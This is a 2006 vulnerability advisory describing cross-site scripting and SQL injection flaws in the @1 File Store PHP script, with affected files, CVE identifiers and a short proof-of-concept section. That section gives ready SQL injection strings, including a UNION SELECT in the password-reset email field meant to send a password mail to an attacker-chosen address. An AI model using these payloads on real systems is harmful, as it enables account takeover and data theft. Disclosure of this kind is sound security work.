Multiple XSS and SQL Injection in @1 File Store
Summary
- Vulnerability
- Multiple XSS and SQL Injection in @1 File Store
- Discovered
- 2006.03.11
- Last Update
- 2006.03.21 Exploitation code published
- ID
- EV0095
- CVE
- CVE-2006-1277 CVE-2006-1278
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. Vendor notyfied.
- Vendor
- n/a
- Vulnerable Software
- @1 File Store (http://www.upoint.info/cgi/download/)
- Version
- 2006.03.07
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in @1 File Store (http://www.upoint.info/cgi/download/) script.
1. Multiple XSS Vulnerabilities
Vulnerable script: signup.php
Parameters 'real_name', 'email', 'login' are not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
2. Multiple SQL Injection Vulnerabilities
'id' parameter is not properly sanitized before being used in SQL queries. This can be used to make any SQL query by injecting arbitrary SQL code.
'email' parameter in password.php is also not properly sanitized before being used in SQL query and allows to make any SQL query.
Condition: magic_quotes_gpc = off
Vulnerable scripts:
libs/functions.php
libs/user.php
control/files/edit.php
control/files/delete.php
control/users/edit.php
control/users/delete.php
control/folders/edit.php
control/folders/access.php
control/folders/delete.php
control/groups/edit.php
control/groups/delete.php
confirm.php
download.php
password.php
PoC/Exploit
1. Cross-Site Scripting Example:
URL: http://[host]/filestore/signup.php
Real Name: [XSS]
E-mail: [XSS]
Login: [XSS]
2. SQL Injection Examples:
URL: http://[host]/filestore/password.php
E-mail: 99999' union select 1,2,3,4,5,6,7,8,9,10,'hello','world','[send_to_email]',14,15,16/*
Registered user:
http://[host]/filestore/folder.php?id=999'%20or%201/*
Solution.
Solution for "Multiple XSS and SQL Injection in @1 File Store" is not available. Check vendor's website for updates.